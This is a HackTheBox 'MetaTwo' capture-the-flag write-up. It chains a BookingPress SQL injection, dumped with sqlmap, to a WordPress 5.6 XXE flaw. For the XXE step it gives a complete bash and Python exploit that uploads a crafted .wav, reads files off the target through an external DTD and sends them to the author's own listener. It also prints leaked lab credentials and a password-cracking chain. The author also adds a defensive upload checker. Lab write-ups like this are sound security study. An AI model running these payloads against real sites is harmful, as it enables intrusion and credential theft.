
HackTheBox – MetaTwo

Description

After a talk with a certain pentester I realised I have little experience with XXE vulnerabilities, so I decided to try out MetaTwo from HackTheBox. It is a Linux machine of easy difficulty. I really liked the exploitation process, since we have to chain an SQL injection and an XXE vulnerability in order to get a foothold.

I feel this box is kind of OSCP-like.

Enumeration

nmap scan

nmap -A -sVC <ip>

PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
|   256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
|_  256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I added metapress.htb to /etc/hosts.

Port 80 - WordPress

After opening a web browser and navigating to http://metapress.htb we can see the site:

When we navigate to /events we can see there is an action for scheduling a startup meeting, which we can perform.

After we appoint an event (or schedule a meeting) we get this information:

There is one vital thing I learnt during my OSCP course: before going deep into one thing, enumerate the whole system well. Wappalyzer reveals that this site is using the WordPress CMS.

The best tool for enumerating WordPress sites is wpscan. I will show only the important findings in order to keep the writeup readable.

wpscan --url http://metapress.htb/ -e vt,vp,cb,dbe,u1-10 --plugins-detection aggressive --plugins-version-detection aggressive

[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
 | Found By: Rss Generator (Passive Detection)
 |  - http://metapress.htb/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
 |  - http://metapress.htb/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
 |
 | [!] 34 vulnerabilities identified:
 |
 | [!] Title: WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8
 |     Fixed in: 5.6.3
 |     References:
 |      - https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447
 |      - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/29378
 |      - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
 |      - https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/
 |      - https://hackerone.com/reports/1095645
 |      - https://www.youtube.com/watch?v=3NBxcmqCgt4
 |
..........
[+] bookingpress-appointment-booking
 | Location: http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/
 | Last Updated: 2023-05-12T07:48:00.000Z
 | Readme: http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/readme.txt
 | [!] The version is out of date, the latest version is 1.0.61
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/, status: 200
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: BookingPress < 1.0.11 - Unauthenticated SQL Injection
 |     Fixed in: 1.0.11
 |     References:
 |      - https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0739
 |      - https://plugins.trac.wordpress.org/changeset/2684789
 |
 | [!] Title: BookingPress < 1.0.31 - Unauthenticated IDOR in appointment_id
 |     Fixed in: 1.0.31
 |     References:
 |      - https://wpscan.com/vulnerability/8a7bd9f6-2789-474b-a237-01c643fdfba7
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4340
 |
 | Version: 1.0.10 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/readme.txt
 | Confirmed By: Translation File (Aggressive Detection)
 |  - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/languages/bookingpress-appointment-booking-en_US.po, Match: 'sion: BookingPress Appointment Booking v1.0.10'
...................
[i] User(s) Identified:
[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://metapress.htb/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Sitemap (Aggressive Detection)
 |   - http://metapress.htb/wp-sitemap-users-1.xml
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] manager
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Exploitation of BookingPress < 1.0.11 - Unauthenticated SQL Injection

Description of the vulnerability:

The plugin fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection.

When I submitted an appointment I had this request saved in Burp Suite. I saved the request to a file and used sqlmap to exploit this vulnerability (the first attempt below fails because the table option is `-T`, not `--T`).

POC:

sqlmap -r total_service_sqlinj --risk 3 --level 5 --passwords --threads 10 --string='Join us,' --technique=U --T wp_users --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.7.5#pip}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: python3 sqlmap [options]

sqlmap: error: no such option: --T

┌──(p4cm4n㉿P4cm4n-Rog)-[~/Pentest_Learning/HackTheBox/MetaTwo]
└─$ sqlmap -r total_service_sqlinj --risk 3 --level 5 --passwords --threads 10 --string='Join us,' --technique=U -T wp_users --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.5#pip}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:34:25 /2023-05-20/

[12:34:25] [INFO] parsing HTTP request from 'total_service_sqlinj'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[12:34:26] [INFO] resuming back-end DBMS 'mysql'
[12:34:26] [INFO] testing connection to the target URL
[12:34:27] [INFO] testing if the provided string is within the target URL page content
[12:34:27] [WARNING] you provided 'Join us,' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&category_id=1&total_service=1) UNION ALL SELECT CONCAT(0x71786a6271,0x434c526e5a467779615554774c596d7749576f5a564750457947684f67734263616e7347514e6553,0x716b6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&_wpnonce=4785cd7afe
---
[12:34:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[12:34:27] [INFO] fetching database users password hashes
[12:34:27] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[12:34:27] [WARNING] the SQL query provided does not return any output
[12:34:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:34:28] [WARNING] the SQL query provided does not return any output
[12:34:28] [ERROR] unable to retrieve the password hashes for the database users
[12:34:28] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[12:34:28] [INFO] fetching current database
[12:34:28] [INFO] fetching columns for table 'wp_users' in database 'blog'
[12:34:28] [INFO] fetching entries for table 'wp_users' in database 'blog'
[12:34:28] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: blog
Table: wp_users
[2 entries]
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url             | user_pass                          | user_email            | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | http://metapress.htb | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. | admin@metapress.htb   | admin      | 0           | admin        | admin         | 2022-06-23 17:58:28 | <blank>             |
| 2  | <blank>              | $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 | manager@metapress.htb | manager    | 0           | manager      | manager       | 2022-06-23 18:07:55 | <blank>             |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

[12:34:37] [INFO] table 'blog.wp_users' dumped to CSV file '/home/p4cm4n/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv'
[12:34:37] [INFO] fetched data logged to text files under '/home/p4cm4n/.local/share/sqlmap/output/metapress.htb'


I copied the hashes to a file and prepared them for cracking with hashcat.

admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70

I cracked the hash of the manager user.

I used this password to log in to the manager account:

Exploitation of WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8

Vulnerability description:

A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. WordPress used an audio parsing library called ID3 that was affected by an XML External Entity (XXE) vulnerability affecting PHP versions 8 and above.

For the exploitation of this vulnerability we use the tips from this page:

https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

We need to create a malicious .wav file with XML inside it and an external DTD file. When we upload the .wav file, the ID3 library used by WordPress will parse our XML and, as a result (SSRF), send an HTTP request to our web server. The external DTD contains the declaration of two parameter entities: the first one references a file on the victim machine, the second performs the SSRF that sends the content of that file to our server in an HTTP GET request.
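To show what a defender-side upload check would look for in this kind of file, here is an added example (not from the original post) that walks the RIFF chunks of a WAV, pulls out the iXML chunk that the ID3 library parses and flags DOCTYPE/ENTITY/SYSTEM declarations. The sample bytes are constructed inline and the attacker.example host is a placeholder; it also tolerates the chunk-size trick used by the PoC, where the declared size is larger than the bytes present.

```python
import re
import struct

# Constructed sample: a minimal benign WAV (fmt chunk plus an empty data chunk).
BENIGN_WAV = (b"RIFF" + struct.pack("<I", 4 + 8 + 16 + 8) + b"WAVE"
              + b"fmt " + struct.pack("<I", 16)
              + struct.pack("<HHIIHH", 1, 1, 8000, 8000, 1, 8)
              + b"data" + struct.pack("<I", 0))

# Constructed sample with the same layout as the PoC on this page: an iXML chunk
# whose declared size (0x7b) is larger than the XML actually present.
_XML = (b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
        b"'http://attacker.example/xxe.dtd'>%remote;%init;%trick;] >\x00")
MALICIOUS_WAV = b"RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00" + _XML

# Any of these inside embedded XML metadata is reason enough to reject an upload:
# legitimate iXML production metadata carries no DTD and no external entities.
SUSPICIOUS = re.compile(rb"<!DOCTYPE|<!ENTITY|\bSYSTEM\b|\bPUBLIC\b", re.IGNORECASE)


def iter_riff_chunks(data):
    """Yield (fourcc, payload) for each chunk of a RIFF/WAVE blob.

    Declared sizes are not trusted: a chunk claiming more bytes than remain is
    truncated to what is present (the PoC's 0x7b covers only ~119 real bytes),
    and the walk never steps backwards, so a hostile size cannot loop it."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        payload = data[pos + 8:pos + 8 + size]
        yield fourcc, payload
        pos += 8 + size + (size & 1)   # RIFF chunks are word-aligned


def find_xxe_indicators(data):
    """Return the suspicious declarations found in XML-bearing chunks.

    The chunk id alone is not the signal: iXML is what getID3 parses, but any
    chunk whose payload starts with an XML prolog is inspected as well."""
    hits = []
    for fourcc, payload in iter_riff_chunks(data):
        if fourcc == b"iXML" or payload.lstrip().startswith(b"<?xml"):
            hits.extend(m.group(0).decode("latin-1") for m in SUSPICIOUS.finditer(payload))
    return hits


if __name__ == "__main__":
    for name, blob in (("benign.wav", BENIGN_WAV), ("malicious.wav", MALICIOUS_WAV)):
        hits = find_xxe_indicators(blob)
        print(f"{name}: {'REJECT ' + str(hits) if hits else 'ok'}")
```

A check like this belongs in the upload pipeline or a scan of the media directory; the real fix remains upgrading past the version wpscan lists as fixed (5.6.3).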

 

POC:

To make this smooth, I created a bash script and a Python script that automate creating the XML files, uploading the .wav and decoding the file content from the incoming HTTP request.

#!/bin/bash
# Usage: create_xxe_payload.sh <attacker ip> <dtd port> <dtd filename> <output wav>  (defaults match the original one-liner)
ip="${1:-10.10.14.74}"; port="${2:-80}"; dtd="${3:-xxe.dtd}"; out="${4:-malicious.wav}"
echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://${ip}:${port}/${dtd}'>%remote;%init;%trick;] >\x00" > "$out"
#!/usr/bin/python3
import base64
import os
import re
import zlib
import requests
from http.server import HTTPServer, BaseHTTPRequestHandler, SimpleHTTPRequestHandler
from threading import Thread

my_session = requests.Session()
external_dtd_filename = "xxe.dtd"
main_xml_filename = "something.wav"
my_ip = "10.10.14.74"      # our host, the one the target will call back to
wpnonce = ''
nonce = ''
port_dl_server = 3000      # serves xxe.dtd; the exfiltration listener runs on port 80
# Requests go through Burp so they can be inspected; set to None to skip the proxy.
proxy = {"http": "http://127.0.0.1:8080"}
user_agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0"


def get_cookies():
    """Log in as manager so the session cookie is kept in my_session."""
    login_url = "http://metapress.htb/wp-login.php"
    headers = {"Content-Type": "application/x-www-form-urlencoded",
               "User-Agent": user_agent,
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
               "Origin": "http://metapress.htb"}
    data = "log=manager&pwd=partylikearockstar&wp-submit=Log+In&testcookie=1"
    my_session.post(login_url, headers=headers, data=data, proxies=proxy)


def get_nonce():
    """Scrape the upload nonce (_wpnonce) and the heartbeat nonce from upload.php."""
    global wpnonce, nonce
    url = "http://metapress.htb/wp-admin/upload.php"
    headers = {"User-Agent": user_agent,
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
               "Origin": "http://metapress.htb"}
    r = my_session.get(url, headers=headers, proxies=proxy)
    wpnonce = re.findall(r'"_wpnonce":"([^"]*)"', r.text)[0]
    nonce = re.findall(r'"nonce":"([^"]*)"', r.text)[0]


def post_admin_ajax():
    """Send one heartbeat request, as the media library page itself would."""
    url = "http://metapress.htb/wp-admin/admin-ajax.php"
    headers = {
        "User-Agent": user_agent,
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "pl,en-US;q=0.7,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Referer": "http://metapress.htb/wp-admin/upload.php",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": "http://metapress.htb",
    }
    data = f"interval=60&_nonce={nonce}&action=heartbeat&screen_id=upload&has_focus=false"
    my_session.post(url, data=data, headers=headers, proxies=proxy)


def upload_file(filepath):
    """Build the .wav and the DTD for the requested file, then upload the .wav."""
    create_malicious_xml()
    create_external_dtd(filepath)
    if wpnonce == '' or nonce == '':
        get_nonce()

    data = {'name': main_xml_filename,
            'action': "upload-attachment",
            '_wpnonce': wpnonce}
    upload_url = "http://metapress.htb/wp-admin/async-upload.php"
    # Content-Type is left to requests so the multipart boundary is set correctly.
    headers = {"User-Agent": user_agent,
               "Accept": "*/*",
               "Origin": "http://metapress.htb",
               "Referer": "http://metapress.htb/wp-admin/upload.php",
               "Accept-Language": "pl,en-US;q=0.7,en;q=0.3"}
    with open(main_xml_filename, 'rb') as f:
        files = {'async-upload': (main_xml_filename, f, 'audio/x-wav')}
        my_session.post(upload_url, headers=headers, data=data, files=files, proxies=proxy)


def create_malicious_xml():
    """Run the bash helper; it points the DTD URL at our server on port_dl_server."""
    payload = f"./create_xxe_payload.sh {my_ip} {port_dl_server} {external_dtd_filename} {main_xml_filename}"
    os.system(payload)


def create_external_dtd(filepath):
    """Write the DTD: %file reads the target file (deflated and base64-encoded so it
    fits in a URL) and %trick sends it to our listener on port 80 as /?p=..."""
    file_content = f"""<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource={filepath}">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://{my_ip}/?p=%file;'>" >"""
    with open(external_dtd_filename, "w") as f:
        f.write(file_content)


class Redirect(BaseHTTPRequestHandler):
    """Listener on port 80: receives /?p=<base64(deflate(file))> and prints the file."""

    def do_GET(self):
        blob = self.path.replace('/?p=', '').replace('\n', '')
        self.send_response(200)
        self.end_headers()
        self.decode_msg(blob)

    def decode_msg(self, msg):
        print(msg)
        # php://filter's zlib.deflate produces raw DEFLATE; decode it in Python
        # rather than interpolating the received string into a php -r shell command.
        try:
            raw = base64.b64decode(msg)
            try:
                content = zlib.decompress(raw, -zlib.MAX_WBITS)
            except zlib.error:
                content = zlib.decompress(raw, zlib.MAX_WBITS | 32)  # zlib/gzip header
            print(content.decode(errors="replace"))
        except (ValueError, zlib.error) as e:
            print(f"could not decode response: {e}")


class QuietHandler(SimpleHTTPRequestHandler):
    """Serves xxe.dtd from the current directory without logging each request."""
    def log_message(self, format, *args):
        return


def start_server(dl_server):
    if not dl_server:
        HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()
    else:
        HTTPServer(("0.0.0.0", port_dl_server), QuietHandler).serve_forever()


thread_rec_server = Thread(target=start_server, args=(False,), daemon=True)
thread_dl_server = Thread(target=start_server, args=(True,), daemon=True)
thread_rec_server.start()
thread_dl_server.start()
print("Started HTTP server on port 80")
print("Getting cookie")
get_cookies()
get_nonce()
post_admin_ajax()

while True:
    filepath = input("Select file from path: ")
    upload_file(filepath)

Now we can execute the script and see how it works.

There is a WordPress file that contains sensitive information: wp-config.php

Select file from path: ../wp-config.php
10.129.228.95 - - [20/May/2023 13:02:44] "GET /?p=jVVZU/JKEH2+VvkfhhKMoARUQBARAoRNIED............
.......
<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'blog' );

/** MySQL database username */
define( 'DB_USER', 'blog' );

/** MySQL database password */
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );
.........

FTP files exfiltration / Shell as jnelson

Now we can use the FTP credentials found in the wp-config.php file:

metapress.htb:9NYS_ii@FyL_p5M2NvJ

Let's check the content of send_email.php:

Now we should check whether these credentials are reused for jnelson.

We managed to log in to the box as jnelson.

 

Shell as root

In the home folder of jnelson I found an interesting directory related to a common password manager named passpie:

In the .keys file there is a PGP public and private key; it's probably used for passpie's encryption.

In the ssh directory there are SSH credentials encrypted with that GnuPG key.

jnelson@meta2:~/.passpie$ cat .keys
-----BEGIN PGP PUBLIC KEY BLOCK-----
[public key block omitted]
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP PRIVATE KEY BLOCK-----
[private key block omitted]
-----END PGP PRIVATE KEY BLOCK-----

I downloaded the PGP key, removed the public key and extracted the hash using gpg2john:

gpg2john keys | awk -F ':' '{print $2}'

I saved the output to the file `hash` and used John the Ripper to crack it:

john --wordlist=/usr/share/wordlists/rockyou.txt hash

After getting the encryption password we just need to execute the following command to get the root password:

passpie copy ssh --passphrase blink182 --to stdout

Now we can use the root password to switch users and get the flags:


One Comment

Robert, 21 December 2023 at 11:54 am:

Hey, very cool post! I've learnt a lot!